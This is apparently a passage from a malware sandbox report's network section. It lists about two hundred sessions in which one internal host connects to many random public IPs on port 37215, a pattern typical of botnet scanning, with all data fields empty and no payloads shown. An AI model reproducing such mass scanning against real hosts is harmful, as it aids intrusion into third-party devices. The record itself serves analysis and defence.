                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4756192.168.2.1337586157.21.152.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4757192.168.2.133435841.239.120.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4758192.168.2.135392041.221.220.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4759192.168.2.1359852197.69.138.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4760192.168.2.1342004157.81.11.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4761192.168.2.1333746197.54.249.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4762192.168.2.1346344157.108.249.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4763192.168.2.133619641.88.139.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4764192.168.2.1333894149.25.204.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4765192.168.2.1347802197.231.222.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4766192.168.2.1334992157.106.102.5837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4767192.168.2.134790441.189.126.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4768192.168.2.1359120197.134.203.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4769192.168.2.133781241.137.191.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4770192.168.2.1338128157.98.174.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4771192.168.2.1351098130.96.52.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4772192.168.2.1360654223.155.179.7437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4773192.168.2.1341654197.173.34.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4774192.168.2.1343396157.94.56.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4775192.168.2.1354282157.152.174.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4776192.168.2.1342416197.77.165.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4777192.168.2.135851041.82.90.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4778192.168.2.1335168157.128.96.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4779192.168.2.135231641.2.20.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4780192.168.2.1347874157.68.238.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4781192.168.2.1345408157.47.12.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4782192.168.2.133476641.5.98.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4783192.168.2.135649886.240.243.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4784192.168.2.134896669.194.6.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4785192.168.2.1358254157.104.12.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4786192.168.2.1349932157.215.220.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4787192.168.2.1345772157.99.145.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4788192.168.2.133618841.247.243.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4789192.168.2.1348262157.117.166.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4790192.168.2.1360004157.220.50.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4791192.168.2.1333706157.226.16.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4792192.168.2.133421041.201.138.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4793192.168.2.1333846197.95.132.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4794192.168.2.1340754197.115.44.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4795192.168.2.1335850101.191.136.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4796192.168.2.135248241.28.244.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4797192.168.2.1352418157.157.151.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4798192.168.2.134826841.241.44.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4799192.168.2.134683641.25.251.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4800192.168.2.1357200209.241.157.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4801192.168.2.1333892170.147.215.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4802192.168.2.1350954197.247.33.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4803192.168.2.1345738157.210.136.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4804192.168.2.1355206197.174.190.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4805192.168.2.134292241.124.164.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4806192.168.2.1357876180.18.244.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4807192.168.2.135077841.217.226.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4808192.168.2.1348852157.55.234.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4809192.168.2.134747641.7.237.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4810192.168.2.134718836.42.254.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4811192.168.2.134841641.219.50.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4812192.168.2.1347292217.146.100.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4813192.168.2.1350216157.210.176.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4814192.168.2.1337730197.180.68.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4815192.168.2.135454241.166.98.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4816192.168.2.134180041.80.228.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4817192.168.2.1348366157.237.59.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4818192.168.2.1334362123.193.149.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4819192.168.2.1333126197.28.148.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4820192.168.2.1343742197.234.95.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4821192.168.2.133371041.88.247.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4822192.168.2.134795041.143.224.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4823192.168.2.1334546157.222.48.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4824192.168.2.1359448157.10.144.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4825192.168.2.1338162157.50.182.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4826192.168.2.135059841.18.76.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4827192.168.2.1352452197.65.77.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4828192.168.2.1352324157.76.93.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4829192.168.2.135252814.192.183.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4830192.168.2.1341182197.4.110.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4831192.168.2.1333960197.59.100.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4832192.168.2.1341430197.50.1.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4833192.168.2.134871641.48.196.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4834192.168.2.133389252.78.72.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4835192.168.2.1340364193.129.0.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4836192.168.2.134913441.158.2.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4837192.168.2.1349068221.101.192.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4838192.168.2.1349634110.48.204.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4839192.168.2.1339992157.228.31.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4840192.168.2.133938441.63.177.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4841192.168.2.1335902197.208.22.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4842192.168.2.1345388157.101.246.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4843192.168.2.1351392157.88.178.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4844192.168.2.1353192157.48.216.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4845192.168.2.133449449.116.17.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4846192.168.2.1337326151.175.73.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4847192.168.2.1340760197.21.212.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4848192.168.2.1340950157.134.222.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4849192.168.2.1350116197.230.162.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4850192.168.2.133445060.148.120.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4851192.168.2.1359854157.21.107.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4852192.168.2.1352730154.189.74.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4853192.168.2.1352100120.187.199.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4854192.168.2.1343122157.28.94.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4855192.168.2.1357982157.191.62.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4856192.168.2.1355392131.216.238.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4857192.168.2.134097039.254.185.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4858192.168.2.1339554196.191.3.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4859192.168.2.1353934178.5.202.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4860192.168.2.134469639.211.187.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4861192.168.2.1349836197.148.232.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4862192.168.2.1340904197.61.20.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4863192.168.2.1339072197.130.111.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4864192.168.2.135831841.143.146.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4865192.168.2.133767041.176.27.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4866192.168.2.1339826197.131.23.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4867192.168.2.135146241.153.56.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4868192.168.2.1345202197.36.4.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4869192.168.2.1344310197.31.147.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4870192.168.2.134412089.7.16.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4871192.168.2.1339432204.105.160.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4872192.168.2.135788641.235.193.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4873192.168.2.1333228197.255.190.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4874192.168.2.1333346199.244.26.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4875192.168.2.1359816157.90.100.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4876192.168.2.1338794197.203.176.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4877192.168.2.134197013.182.221.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4878192.168.2.133822841.55.24.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4879192.168.2.1350922157.185.122.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4880192.168.2.1332956157.45.194.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4881192.168.2.135699099.223.209.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4882192.168.2.1342178197.213.216.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4883192.168.2.1344752157.27.176.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4884192.168.2.134583241.125.224.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4885192.168.2.135162412.235.209.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4886192.168.2.1355568217.180.35.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4887192.168.2.1340482117.113.217.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4888192.168.2.1338892197.186.182.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4889192.168.2.1360004101.157.129.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4890192.168.2.1349620157.250.123.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4891192.168.2.1343130197.220.251.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4892192.168.2.135688691.173.161.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4893192.168.2.1349854157.98.36.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4894192.168.2.134207441.203.51.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4895192.168.2.133569241.34.189.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4896192.168.2.133711834.142.140.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4897192.168.2.1336864157.112.27.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4898192.168.2.1360024211.9.111.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4899192.168.2.1334282197.60.40.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4900192.168.2.134316241.40.232.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4901192.168.2.1343490197.227.106.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4902192.168.2.134248841.125.91.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4903192.168.2.1337330157.49.27.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4904192.168.2.134391041.31.101.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4905192.168.2.1337674197.174.62.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4906192.168.2.1337326157.245.191.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4907192.168.2.1341854131.196.203.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4908192.168.2.1360128157.126.88.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4909192.168.2.1333746157.143.248.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4910192.168.2.1351790197.101.234.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4911192.168.2.1333482157.136.180.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4912192.168.2.1348566157.119.103.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4913192.168.2.1353374197.16.249.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4914192.168.2.1353228157.76.171.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4915192.168.2.1357634157.234.237.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4916192.168.2.1359766197.118.221.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4917192.168.2.1350842125.249.251.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4918192.168.2.1334738197.107.216.4737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4919192.168.2.1337368157.223.121.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4920192.168.2.1355738197.224.153.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4921192.168.2.135632641.154.39.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4922192.168.2.1350770197.3.84.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4923192.168.2.135409041.170.110.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4924192.168.2.1352662157.114.122.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4925192.168.2.1343858100.58.9.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4926192.168.2.136064841.208.218.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4927192.168.2.1357676157.175.132.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4928192.168.2.1360748113.85.89.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4929192.168.2.134410841.47.84.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4930192.168.2.1340180197.78.100.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4931192.168.2.136091467.101.45.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4932192.168.2.1336716146.213.125.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4933192.168.2.133682041.249.129.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4934192.168.2.1350628197.74.124.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4935192.168.2.1352136197.90.24.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4936192.168.2.1338168157.109.143.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4937192.168.2.135074241.237.246.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4938192.168.2.134606841.151.97.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4939192.168.2.134664841.144.187.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4940192.168.2.1355900136.82.51.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4941192.168.2.1353610197.100.89.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4942192.168.2.134749241.82.89.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4943192.168.2.1345058197.32.125.5937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4944192.168.2.1353984157.229.239.1337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4945192.168.2.1347144197.19.77.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4946192.168.2.1338918157.6.247.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4947192.168.2.133735483.140.220.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4948192.168.2.1353540197.152.63.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4949192.168.2.1336256157.220.110.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4950192.168.2.135320641.171.123.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4951192.168.2.1346834218.243.154.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4952192.168.2.1349588113.45.57.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4953192.168.2.1336018192.237.89.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4954192.168.2.1350156157.4.209.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4955192.168.2.1351316157.124.86.11937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4956192.168.2.1339398197.131.138.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4957192.168.2.134951241.219.249.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4958192.168.2.134319241.14.195.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4959192.168.2.135169450.183.164.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4960192.168.2.1356244197.158.204.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4961192.168.2.1360814157.20.61.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4962192.168.2.1358974197.245.77.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4963192.168.2.1349886157.34.193.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4964192.168.2.133657641.194.199.9537215
                                                  TimestampBytes transferredDirectionData


